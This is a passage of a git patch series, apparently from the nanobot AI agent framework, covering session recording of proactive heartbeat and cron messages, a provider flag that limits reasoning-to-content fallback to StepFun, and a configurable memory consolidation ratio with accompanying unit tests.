b/tests/heartbeat/test_heartbeat_context_bridge.py index ced2ddddc..5ec02a8bb 100644 --- a/tests/heartbeat/test_heartbeat_context_bridge.py +++ b/tests/heartbeat/test_heartbeat_context_bridge.py @@ -20,7 +20,11 @@ class TestHeartbeatContextBridge: # Simulate what on_heartbeat_notify does target_session = session_mgr.get_or_create(target_key) - target_session.add_message("assistant", "3 new emails — invoice, meeting, proposal.") + target_session.add_message( + "assistant", + "3 new emails — invoice, meeting, proposal.", + _channel_delivery=True, + ) session_mgr.save(target_session) # Reload and verify @@ -45,7 +49,11 @@ class TestHeartbeatContextBridge: # Step 1: heartbeat injects assistant message session = session_mgr.get_or_create(target_key) - session.add_message("assistant", "If you want, I can mark that email as read.") + session.add_message( + "assistant", + "If you want, I can mark that email as read.", + _channel_delivery=True, + ) session_mgr.save(session) # Step 2: user replies "Sure" @@ -76,7 +84,11 @@ class TestHeartbeatContextBridge: # Heartbeat injects session = session_mgr.get_or_create(target_key) - session.add_message("assistant", "You have a meeting in 30 minutes.") + session.add_message( + "assistant", + "You have a meeting in 30 minutes.", + _channel_delivery=True, + ) session_mgr.save(session) # Verify @@ -86,17 +98,23 @@ class TestHeartbeatContextBridge: assert roles == ["user", "assistant", "user", "assistant"] assert "meeting in 30 minutes" in history[-1]["content"] - def test_injection_to_empty_session(self, tmp_path): - """Injecting into a brand-new session (no prior messages) works.""" + def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path): + """A user replying to the first delivered message still sees that context.""" session_mgr = SessionManager(tmp_path / "sessions") target_key = "telegram:99999" session = session_mgr.get_or_create(target_key) - session.add_message("assistant", "Weather alert: sandstorm expected at 4pm.") + session.add_message( + "assistant", + "Weather alert: sandstorm expected at 4pm.", + _channel_delivery=True, + ) + session.add_message("user", "Sure") session_mgr.save(session) reloaded = session_mgr.get_or_create(target_key) history = reloaded.get_history(max_messages=0) - assert len(history) == 1 + assert len(history) == 2 assert history[0]["role"] == "assistant" assert "sandstorm" in history[0]["content"] + assert history[1] == {"role": "user", "content": "Sure"} From 6036355ac513b1ec8e5dccccfe3679e9290753d2 Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 12:05:13 +0000 Subject: [PATCH 16/25] fix(message): limit session recording to proactive sends Only mark message-tool deliveries for channel-session recording while cron jobs are running, avoiding duplicate session writes during normal user turns. Made-with: Cursor --- nanobot/agent/tools/message.py | 22 +++++++++++++++++++--- nanobot/cli/commands.py | 29 +++++++++++++++++++++++++---- tests/tools/test_message_tool.py | 21 +++++++++++++++++++++ 3 files changed, 65 insertions(+), 7 deletions(-) diff --git a/nanobot/agent/tools/message.py b/nanobot/agent/tools/message.py index ee78df467..ea7f91bc8 100644 --- a/nanobot/agent/tools/message.py +++ b/nanobot/agent/tools/message.py @@ -42,6 +42,10 @@ class MessageTool(Tool): default=default_message_id, ) self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False) + self._record_channel_delivery_var: ContextVar[bool] = ContextVar( + "message_record_channel_delivery", + default=False, + ) def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None: """Set the current message context.""" @@ -57,6 +61,14 @@ class MessageTool(Tool): """Reset per-turn send tracking.""" self._sent_in_turn = False + def set_record_channel_delivery(self, active: bool): + """Mark tool-sent messages as proactive channel deliveries.""" + return self._record_channel_delivery_var.set(active) + + def reset_record_channel_delivery(self, token) -> None: + """Restore previous proactive delivery recording state.""" + self._record_channel_delivery_var.reset(token) + @property def _sent_in_turn(self) -> bool: return self._sent_in_turn_var.get() @@ -117,15 +129,19 @@ class MessageTool(Tool): if not self._send_callback: return "Error: Message sending not configured" + metadata = { + "message_id": message_id, + } if message_id else {} + if self._record_channel_delivery_var.get(): + metadata["_record_channel_delivery"] = True + msg = OutboundMessage( channel=channel, chat_id=chat_id, content=content, media=media or [], buttons=buttons or [], - metadata={ - "message_id": message_id, - } if message_id else {}, + metadata=metadata, ) try: diff --git a/nanobot/cli/commands.py b/nanobot/cli/commands.py index 684e7f4c4..e403d5455 100644 --- a/nanobot/cli/commands.py +++ b/nanobot/cli/commands.py @@ -716,8 +716,20 @@ def _run_gateway( else f"{channel}:{chat_id}" ) - async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = True) -> None: + async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = False) -> None: """Publish a user-visible message and mirror it into that channel's session.""" + metadata = dict(msg.metadata or {}) + record = record or bool(metadata.pop("_record_channel_delivery", False)) + if metadata != (msg.metadata or {}): + msg = OutboundMessage( + channel=msg.channel, + chat_id=msg.chat_id, + content=msg.content, + reply_to=msg.reply_to, + media=msg.media, + metadata=metadata, + buttons=msg.buttons, + ) if ( record and msg.channel != "cli" @@ -762,6 +774,10 @@ def _run_gateway( async def _silent(*_args, **_kwargs): pass + message_record_token = None + if isinstance(message_tool, MessageTool): + message_record_token = message_tool.set_record_channel_delivery(True) + try: resp = await agent.process_direct( reminder_note, @@ -773,10 +789,11 @@ def _run_gateway( finally: if isinstance(cron_tool, CronTool) and cron_token is not None: cron_tool.reset_cron_context(cron_token) + if isinstance(message_tool, MessageTool) and message_record_token is not None: + message_tool.reset_record_channel_delivery(message_record_token) response = resp.content if resp else "" - message_tool = agent.tools.get("message") if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn: return response @@ -790,7 +807,8 @@ def _run_gateway( channel=job.payload.channel or "cli", chat_id=job.payload.to, content=response, - ) + ), + record=True, ) return response @@ -853,7 +871,10 @@ def _run_gateway( if channel == "cli": return # No external channel available to deliver to - await _deliver_to_channel(OutboundMessage(channel=channel, chat_id=chat_id, content=response)) + await _deliver_to_channel( + OutboundMessage(channel=channel, chat_id=chat_id, content=response), + record=True, + ) hb_cfg = config.gateway.heartbeat heartbeat = HeartbeatService( diff --git a/tests/tools/test_message_tool.py b/tests/tools/test_message_tool.py index b65b5cd8d..18a881215 100644 --- a/tests/tools/test_message_tool.py +++ b/tests/tools/test_message_tool.py @@ -1,6 +1,7 @@ import pytest from nanobot.agent.tools.message import MessageTool +from nanobot.bus.events import OutboundMessage @pytest.mark.asyncio @@ -29,3 +30,23 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None: content="hi", channel="telegram", chat_id="1", buttons=bad, ) assert result == "Error: buttons must be a list of list of strings" + + +@pytest.mark.asyncio +async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None: + sent: list[OutboundMessage] = [] + + async def _send(msg: OutboundMessage) -> None: + sent.append(msg) + + tool = MessageTool(send_callback=_send) + + await tool.execute(content="normal", channel="telegram", chat_id="1") + token = tool.set_record_channel_delivery(True) + try: + await tool.execute(content="cron", channel="telegram", chat_id="1") + finally: + tool.reset_record_channel_delivery(token) + + assert sent[0].metadata == {} + assert sent[1].metadata == {"_record_channel_delivery": True} From 3de843a229a22f2c58e22bed647ee9a8bf742a52 Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Sat, 25 Apr 2026 23:13:46 +0800 Subject: [PATCH 17/25] fix(provider): gate reasoning-to-content fallback behind spec flag MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The non-streaming parse path unconditionally promoted the `reasoning` response field to `content` when content was empty. This was intended for StepFun (whose API returns the actual answer in `reasoning`), but it applied to every OpenAI-compatible provider — causing internal thinking chains from models like Xiaomi MIMO to be leaked as formal replies. Add `reasoning_as_content: bool` to ProviderSpec (default False) and set it only for StepFun. The fallback now requires this flag rather than running globally. Fixes #3443 --- nanobot/providers/openai_compat_provider.py | 6 +-- nanobot/providers/registry.py | 6 +++ tests/providers/test_stepfun_reasoning.py | 60 +++++++++++++++++++-- 3 files changed, 65 insertions(+), 7 deletions(-) diff --git a/nanobot/providers/openai_compat_provider.py b/nanobot/providers/openai_compat_provider.py index ef255cf23..558093822 100644 --- a/nanobot/providers/openai_compat_provider.py +++ b/nanobot/providers/openai_compat_provider.py @@ -759,8 +759,8 @@ class OpenAICompatProvider(LLMProvider): finish_reason = str(choice0.get("finish_reason") or "stop") raw_tool_calls: list[Any] = [] - # StepFun Plan: fallback to reasoning field when content is empty - if not content and msg0.get("reasoning"): + # StepFun: fallback to reasoning field when content is empty + if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content: content = self._extract_text_content(msg0.get("reasoning")) reasoning_content = msg0.get("reasoning_content") if not reasoning_content and msg0.get("reasoning"): @@ -820,7 +820,7 @@ class OpenAICompatProvider(LLMProvider): finish_reason = ch.finish_reason if not content and m.content: content = m.content - if not content and getattr(m, "reasoning", None): + if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content: content = m.reasoning tool_calls = [] diff --git a/nanobot/providers/registry.py b/nanobot/providers/registry.py index 5037e3003..6cb57cb04 100644 --- a/nanobot/providers/registry.py +++ b/nanobot/providers/registry.py @@ -71,6 +71,11 @@ class ProviderSpec: # "reasoning_split" — {"reasoning_split": true/false} (MiniMax) thinking_style: str = "" + # When True, treat the "reasoning" response field as formal content + # when "content" is empty. Only set this for providers (e.g. StepFun) + # whose API returns the actual answer in "reasoning" instead of "content". + reasoning_as_content: bool = False + @property def label(self) -> str: return self.display_name or self.name.title() @@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = ( display_name="Step Fun", backend="openai_compat", default_api_base="https://api.stepfun.com/v1", + reasoning_as_content=True, ), # Xiaomi MIMO (小米): OpenAI-compatible API ProviderSpec( diff --git a/tests/providers/test_stepfun_reasoning.py b/tests/providers/test_stepfun_reasoning.py index 05e5416d4..8d7cbdb91 100644 --- a/tests/providers/test_stepfun_reasoning.py +++ b/tests/providers/test_stepfun_reasoning.py @@ -9,6 +9,17 @@ from types import SimpleNamespace from unittest.mock import patch from nanobot.providers.openai_compat_provider import OpenAICompatProvider +from nanobot.providers.registry import ProviderSpec + +_STEPFUN_SPEC = ProviderSpec( + name="stepfun", + keywords=("stepfun", "step"), + env_key="STEPFUN_API_KEY", + display_name="Step Fun", + backend="openai_compat", + default_api_base="https://api.stepfun.com/v1", + reasoning_as_content=True, +) # ── _parse: dict branch ───────────────────────────────────────────────────── @@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider def test_parse_dict_stepfun_reasoning_fallback() -> None: """When content is None and reasoning exists, content falls back to reasoning.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) response = { "choices": [{ @@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None: def test_parse_dict_stepfun_reasoning_priority() -> None: """reasoning_content field takes priority over reasoning when both present.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) response = { "choices": [{ @@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None): def test_parse_sdk_stepfun_reasoning_fallback() -> None: """SDK branch: content falls back to msg.reasoning when content is None.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.") choice = SimpleNamespace(finish_reason="stop", message=msg) @@ -90,7 +101,7 @@ def test_parse_sdk_stepfun_reasoning_fallback() -> None: def test_parse_sdk_stepfun_reasoning_priority() -> None: """reasoning_content field takes priority over reasoning in SDK branch.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) msg = _make_sdk_message( content=None, @@ -244,3 +255,44 @@ def test_parse_chunks_sdk_reasoning_precedence() -> None: result = OpenAICompatProvider._parse_chunks(chunks) assert result.reasoning_content == "formal: " + + +# ── Regression: non-StepFun providers must NOT promote reasoning to content ─ + + +def test_parse_dict_non_stepfun_no_reasoning_as_content() -> None: + """Providers without reasoning_as_content flag must not treat reasoning as content.""" + with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): + provider = OpenAICompatProvider() + + response = { + "choices": [{ + "message": { + "content": None, + "reasoning": "internal thought process that should NOT be shown to user", + }, + "finish_reason": "stop", + }], + } + + result = provider._parse(response) + + # content stays None — reasoning is NOT promoted + assert result.content is None + # reasoning still goes to reasoning_content for display as thinking + assert result.reasoning_content == "internal thought process that should NOT be shown to user" + + +def test_parse_sdk_non_stepfun_no_reasoning_as_content() -> None: + """SDK branch: providers without flag must not treat reasoning as content.""" + with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): + provider = OpenAICompatProvider() + + msg = _make_sdk_message(content=None, reasoning="internal monologue") + choice = SimpleNamespace(finish_reason="stop", message=msg) + response = SimpleNamespace(choices=[choice], usage=None) + + result = provider._parse(response) + + assert result.content is None + assert result.reasoning_content == "internal monologue" From 80ee4483f8a3e10ba12abfd413c310d2d31df2d2 Mon Sep 17 00:00:00 2001 From: Subal Date: Sat, 18 Apr 2026 19:47:09 +0530 Subject: [PATCH 18/25] feat: make consolidation ratio configurable --- nanobot/agent/loop.py | 2 ++ nanobot/agent/memory.py | 4 +++- nanobot/cli/commands.py | 3 +++ nanobot/config/schema.py | 7 +++++++ nanobot/nanobot.py | 1 + 5 files changed, 16 insertions(+), 1 deletion(-) diff --git a/nanobot/agent/loop.py b/nanobot/agent/loop.py index 5a4480041..f1efc16e2 100644 --- a/nanobot/agent/loop.py +++ b/nanobot/agent/loop.py @@ -190,6 +190,7 @@ class AgentLoop: channels_config: ChannelsConfig | None = None, timezone: str | None = None, session_ttl_minutes: int = 0, + consolidation_ratio: float = 0.5, hooks: list[AgentHook] | None = None, unified_session: bool = False, disabled_skills: list[str] | None = None, @@ -269,6 +270,7 @@ class AgentLoop: build_messages=self.context.build_messages, get_tool_definitions=self.tools.get_definitions, max_completion_tokens=provider.generation.max_tokens, + consolidation_ratio=consolidation_ratio, ) self.auto_compact = AutoCompact( sessions=self.sessions, diff --git a/nanobot/agent/memory.py b/nanobot/agent/memory.py index 16c01d31c..cc14ea744 100644 --- a/nanobot/agent/memory.py +++ b/nanobot/agent/memory.py @@ -435,6 +435,7 @@ class Consolidator: build_messages: Callable[..., list[dict[str, Any]]], get_tool_definitions: Callable[[], list[dict[str, Any]]], max_completion_tokens: int = 4096, + consolidation_ratio: float = 0.5, ): self.store = store self.provider = provider @@ -442,6 +443,7 @@ class Consolidator: self.sessions = sessions self.context_window_tokens = context_window_tokens self.max_completion_tokens = max_completion_tokens + self.consolidation_ratio = consolidation_ratio self._build_messages = build_messages self._get_tool_definitions = get_tool_definitions self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = ( @@ -568,7 +570,7 @@ class Consolidator: lock = self.get_lock(session.key) async with lock: budget = self._input_token_budget - target = budget // 2 + target = int(budget * self.consolidation_ratio) try: estimated, source = self.estimate_session_prompt_tokens( session, diff --git a/nanobot/cli/commands.py b/nanobot/cli/commands.py index e403d5455..e1b317ed1 100644 --- a/nanobot/cli/commands.py +++ b/nanobot/cli/commands.py @@ -597,6 +597,7 @@ def serve( unified_session=runtime_config.agents.defaults.unified_session, disabled_skills=runtime_config.agents.defaults.disabled_skills, session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes, + consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio, tools_config=runtime_config.tools, ) @@ -703,6 +704,7 @@ def _run_gateway( unified_session=config.agents.defaults.unified_session, disabled_skills=config.agents.defaults.disabled_skills, session_ttl_minutes=config.agents.defaults.session_ttl_minutes, + consolidation_ratio=config.agents.defaults.consolidation_ratio, tools_config=config.tools, ) @@ -1077,6 +1079,7 @@ def agent( unified_session=config.agents.defaults.unified_session, disabled_skills=config.agents.defaults.disabled_skills, session_ttl_minutes=config.agents.defaults.session_ttl_minutes, + consolidation_ratio=config.agents.defaults.consolidation_ratio, tools_config=config.tools, ) restart_notice = consume_restart_notice_from_env() diff --git a/nanobot/config/schema.py b/nanobot/config/schema.py index cca8f210f..e1f91aeb0 100644 --- a/nanobot/config/schema.py +++ b/nanobot/config/schema.py @@ -90,6 +90,13 @@ class AgentDefaults(Base): validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"), serialization_alias="idleCompactAfterMinutes", ) # Auto-compact idle threshold in minutes (0 = disabled) + consolidation_ratio: float = Field( + default=0.5, + ge=0.1, + le=0.95, + validation_alias=AliasChoices("consolidationRatio"), + serialization_alias="consolidationRatio", + ) # Consolidation target ratio (0.5 = 50% of budget retained after compression) dream: DreamConfig = Field(default_factory=DreamConfig) diff --git a/nanobot/nanobot.py b/nanobot/nanobot.py index 96102e3d2..f9aeae84e 100644 --- a/nanobot/nanobot.py +++ b/nanobot/nanobot.py @@ -84,6 +84,7 @@ class Nanobot: unified_session=defaults.unified_session, disabled_skills=defaults.disabled_skills, session_ttl_minutes=defaults.session_ttl_minutes, + consolidation_ratio=defaults.consolidation_ratio, tools_config=config.tools, ) return cls(loop) From fca56d324adedca10acd479eb4369971b5972377 Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Sat, 18 Apr 2026 23:06:51 +0800 Subject: [PATCH 19/25] test: add unit tests for configurable consolidation_ratio Cover ratio propagation, schema validation, and consolidation behavior with different ratio values (0.1, 0.5, 0.9). --- tests/agent/test_consolidation_ratio.py | 179 ++++++++++++++++++++++++ 1 file changed, 179 insertions(+) create mode 100644 tests/agent/test_consolidation_ratio.py diff --git a/tests/agent/test_consolidation_ratio.py b/tests/agent/test_consolidation_ratio.py new file mode 100644 index 000000000..8e621d358 --- /dev/null +++ b/tests/agent/test_consolidation_ratio.py @@ -0,0 +1,179 @@ +"""Tests for the configurable consolidation_ratio feature.""" + +from unittest.mock import AsyncMock, MagicMock + +import pytest + +from nanobot.agent.loop import AgentLoop +import nanobot.agent.memory as memory_module +from nanobot.bus.queue import MessageBus +from nanobot.providers.base import GenerationSettings, LLMResponse + + +def _make_loop( + tmp_path, + *, + estimated_tokens: int = 0, + context_window_tokens: int = 200, + consolidation_ratio: float = 0.5, +) -> AgentLoop: + provider = MagicMock() + provider.get_default_model.return_value = "test-model" + provider.generation = GenerationSettings(max_tokens=0) + provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter") + _response = LLMResponse(content="ok", tool_calls=[]) + provider.chat_with_retry = AsyncMock(return_value=_response) + provider.chat_stream_with_retry = AsyncMock(return_value=_response) + + loop = AgentLoop( + bus=MessageBus(), + provider=provider, + workspace=tmp_path, + model="test-model", + context_window_tokens=context_window_tokens, + consolidation_ratio=consolidation_ratio, + ) + loop.tools.get_definitions = MagicMock(return_value=[]) + loop.consolidator._SAFETY_BUFFER = 0 + return loop + + +@pytest.mark.asyncio +async def test_default_ratio_uses_half_budget(tmp_path, monkeypatch) -> None: + """With ratio=0.5 (default), target should be half of budget.""" + loop = _make_loop(tmp_path, context_window_tokens=200, consolidation_ratio=0.5) + loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] + + session = loop.sessions.get_or_create("cli:test") + session.messages = [ + {"role": "user", "content": "u1", "timestamp": "2026-01-01T00:00:00"}, + {"role": "assistant", "content": "a1", "timestamp": "2026-01-01T00:00:01"}, + {"role": "user", "content": "u2", "timestamp": "2026-01-01T00:00:02"}, + {"role": "assistant", "content": "a2", "timestamp": "2026-01-01T00:00:03"}, + {"role": "user", "content": "u3", "timestamp": "2026-01-01T00:00:04"}, + {"role": "assistant", "content": "a3", "timestamp": "2026-01-01T00:00:05"}, + {"role": "user", "content": "u4", "timestamp": "2026-01-01T00:00:06"}, + ] + loop.sessions.save(session) + + # budget = 200 - 0 (max_tokens) - 0 (safety_buffer) = 200 + # target = int(200 * 0.5) = 100 + # estimated must be >= budget to trigger consolidation + call_count = [0] + + def mock_estimate(_session): + call_count[0] += 1 + if call_count[0] == 1: + return (250, "test") + return (90, "test") + + loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] + monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) + + await loop.consolidator.maybe_consolidate_by_tokens(session) + + # 250 >= 200 (budget, triggers) → 250 > 100 (target) → archive → 90 < 100, stops. + assert loop.consolidator.archive.await_count == 1 + + +@pytest.mark.asyncio +async def test_low_ratio_aggressively_consolidates(tmp_path, monkeypatch) -> None: + """With ratio=0.1, target is only 10% of budget — more rounds of archiving.""" + loop = _make_loop(tmp_path, context_window_tokens=1000, consolidation_ratio=0.1) + loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] + + session = loop.sessions.get_or_create("cli:test") + # Interleave user/assistant so pick_consolidation_boundary can find boundaries + session.messages = [] + for i in range(10): + session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"}) + session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"}) + loop.sessions.save(session) + + # budget = 1000, target = int(1000 * 0.1) = 100 + call_count = [0] + + def mock_estimate(_session): + call_count[0] += 1 + if call_count[0] == 1: + return (1200, "test") + if call_count[0] == 2: + return (800, "test") + if call_count[0] == 3: + return (400, "test") + return (50, "test") + + loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] + monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) + + await loop.consolidator.maybe_consolidate_by_tokens(session) + + # With low ratio, more rounds needed to reach target; at least 2 rounds + assert loop.consolidator.archive.await_count >= 2 + + +@pytest.mark.asyncio +async def test_high_ratio_preserves_more_history(tmp_path, monkeypatch) -> None: + """With ratio=0.9, target is 90% of budget — consolidation stops sooner.""" + loop = _make_loop(tmp_path, context_window_tokens=200, consolidation_ratio=0.9) + loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] + + session = loop.sessions.get_or_create("cli:test") + session.messages = [ + {"role": "user", "content": "u1", "timestamp": "2026-01-01T00:00:00"}, + {"role": "assistant", "content": "a1", "timestamp": "2026-01-01T00:00:01"}, + {"role": "user", "content": "u2", "timestamp": "2026-01-01T00:00:02"}, + {"role": "assistant", "content": "a2", "timestamp": "2026-01-01T00:00:03"}, + {"role": "user", "content": "u3", "timestamp": "2026-01-01T00:00:04"}, + {"role": "assistant", "content": "a3", "timestamp": "2026-01-01T00:00:05"}, + {"role": "user", "content": "u4", "timestamp": "2026-01-01T00:00:06"}, + ] + loop.sessions.save(session) + + # budget = 200, target = int(200 * 0.9) = 180 + call_count = [0] + + def mock_estimate(_session): + call_count[0] += 1 + if call_count[0] == 1: + return (300, "test") + return (175, "test") + + loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] + monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) + + await loop.consolidator.maybe_consolidate_by_tokens(session) + + # 300 >= 200 (triggers) → 300 > 180 → archive → 175 < 180 → stop + assert loop.consolidator.archive.await_count == 1 + + +@pytest.mark.asyncio +async def test_ratio_propagated_from_config_schema() -> None: + """Verify consolidation_ratio is parsed from config with camelCase alias.""" + from nanobot.config.schema import AgentDefaults + + # Default + defaults = AgentDefaults() + assert defaults.consolidation_ratio == 0.5 + + # camelCase alias + defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3}) + assert defaults.consolidation_ratio == 0.3 + + # Serialization uses alias + dumped = defaults.model_dump(by_alias=True) + assert dumped["consolidationRatio"] == 0.3 + + +@pytest.mark.asyncio +async def test_ratio_validation_rejects_out_of_range() -> None: + """Invalid ratio values should be rejected by validation.""" + from pydantic import ValidationError + from nanobot.config.schema import AgentDefaults + + with pytest.raises(ValidationError): + AgentDefaults(consolidation_ratio=0.05) + + with pytest.raises(ValidationError): + AgentDefaults(consolidation_ratio=1.0) From 727086ddac2da71af7fcf48293850568a76e275c Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 12:20:07 +0000 Subject: [PATCH 20/25] test: tighten consolidation ratio coverage Made-with: Cursor --- tests/agent/test_consolidation_ratio.py | 145 ++++++------------------ 1 file changed, 37 insertions(+), 108 deletions(-) diff --git a/tests/agent/test_consolidation_ratio.py b/tests/agent/test_consolidation_ratio.py index 8e621d358..b1c95ec4b 100644 --- a/tests/agent/test_consolidation_ratio.py +++ b/tests/agent/test_consolidation_ratio.py @@ -1,12 +1,14 @@ -"""Tests for the configurable consolidation_ratio feature.""" +"""Tests for configurable consolidation_ratio.""" from unittest.mock import AsyncMock, MagicMock import pytest +from pydantic import ValidationError -from nanobot.agent.loop import AgentLoop import nanobot.agent.memory as memory_module +from nanobot.agent.loop import AgentLoop from nanobot.bus.queue import MessageBus +from nanobot.config.schema import AgentDefaults from nanobot.providers.base import GenerationSettings, LLMResponse @@ -38,140 +40,67 @@ def _make_loop( return loop -@pytest.mark.asyncio -async def test_default_ratio_uses_half_budget(tmp_path, monkeypatch) -> None: - """With ratio=0.5 (default), target should be half of budget.""" - loop = _make_loop(tmp_path, context_window_tokens=200, consolidation_ratio=0.5) - loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] - +def _session_with_turns(loop: AgentLoop, *, turns: int): session = loop.sessions.get_or_create("cli:test") - session.messages = [ - {"role": "user", "content": "u1", "timestamp": "2026-01-01T00:00:00"}, - {"role": "assistant", "content": "a1", "timestamp": "2026-01-01T00:00:01"}, - {"role": "user", "content": "u2", "timestamp": "2026-01-01T00:00:02"}, - {"role": "assistant", "content": "a2", "timestamp": "2026-01-01T00:00:03"}, - {"role": "user", "content": "u3", "timestamp": "2026-01-01T00:00:04"}, - {"role": "assistant", "content": "a3", "timestamp": "2026-01-01T00:00:05"}, - {"role": "user", "content": "u4", "timestamp": "2026-01-01T00:00:06"}, - ] - loop.sessions.save(session) - - # budget = 200 - 0 (max_tokens) - 0 (safety_buffer) = 200 - # target = int(200 * 0.5) = 100 - # estimated must be >= budget to trigger consolidation - call_count = [0] - - def mock_estimate(_session): - call_count[0] += 1 - if call_count[0] == 1: - return (250, "test") - return (90, "test") - - loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] - monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) - - await loop.consolidator.maybe_consolidate_by_tokens(session) - - # 250 >= 200 (budget, triggers) → 250 > 100 (target) → archive → 90 < 100, stops. - assert loop.consolidator.archive.await_count == 1 - - -@pytest.mark.asyncio -async def test_low_ratio_aggressively_consolidates(tmp_path, monkeypatch) -> None: - """With ratio=0.1, target is only 10% of budget — more rounds of archiving.""" - loop = _make_loop(tmp_path, context_window_tokens=1000, consolidation_ratio=0.1) - loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] - - session = loop.sessions.get_or_create("cli:test") - # Interleave user/assistant so pick_consolidation_boundary can find boundaries session.messages = [] - for i in range(10): + for i in range(turns): session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"}) - session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"}) + session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"}) loop.sessions.save(session) - - # budget = 1000, target = int(1000 * 0.1) = 100 - call_count = [0] - - def mock_estimate(_session): - call_count[0] += 1 - if call_count[0] == 1: - return (1200, "test") - if call_count[0] == 2: - return (800, "test") - if call_count[0] == 3: - return (400, "test") - return (50, "test") - - loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] - monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) - - await loop.consolidator.maybe_consolidate_by_tokens(session) - - # With low ratio, more rounds needed to reach target; at least 2 rounds - assert loop.consolidator.archive.await_count >= 2 + return session @pytest.mark.asyncio -async def test_high_ratio_preserves_more_history(tmp_path, monkeypatch) -> None: - """With ratio=0.9, target is 90% of budget — consolidation stops sooner.""" - loop = _make_loop(tmp_path, context_window_tokens=200, consolidation_ratio=0.9) +@pytest.mark.parametrize( + ("ratio", "context_window_tokens", "estimates", "expected_archives"), + [ + (0.5, 200, [250, 90], 1), + (0.1, 1000, [1200, 800, 400, 50], 2), + (0.9, 200, [300, 175], 1), + ], +) +async def test_consolidation_ratio_controls_target( + tmp_path, + monkeypatch, + ratio: float, + context_window_tokens: int, + estimates: list[int], + expected_archives: int, +) -> None: + loop = _make_loop( + tmp_path, + context_window_tokens=context_window_tokens, + consolidation_ratio=ratio, + ) loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] + session = _session_with_turns(loop, turns=10) - session = loop.sessions.get_or_create("cli:test") - session.messages = [ - {"role": "user", "content": "u1", "timestamp": "2026-01-01T00:00:00"}, - {"role": "assistant", "content": "a1", "timestamp": "2026-01-01T00:00:01"}, - {"role": "user", "content": "u2", "timestamp": "2026-01-01T00:00:02"}, - {"role": "assistant", "content": "a2", "timestamp": "2026-01-01T00:00:03"}, - {"role": "user", "content": "u3", "timestamp": "2026-01-01T00:00:04"}, - {"role": "assistant", "content": "a3", "timestamp": "2026-01-01T00:00:05"}, - {"role": "user", "content": "u4", "timestamp": "2026-01-01T00:00:06"}, - ] - loop.sessions.save(session) + remaining_estimates = list(estimates) - # budget = 200, target = int(200 * 0.9) = 180 - call_count = [0] - - def mock_estimate(_session): - call_count[0] += 1 - if call_count[0] == 1: - return (300, "test") - return (175, "test") + def mock_estimate(_session, *, session_summary=None): + assert session_summary is None + return (remaining_estimates.pop(0), "test") loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) await loop.consolidator.maybe_consolidate_by_tokens(session) - # 300 >= 200 (triggers) → 300 > 180 → archive → 175 < 180 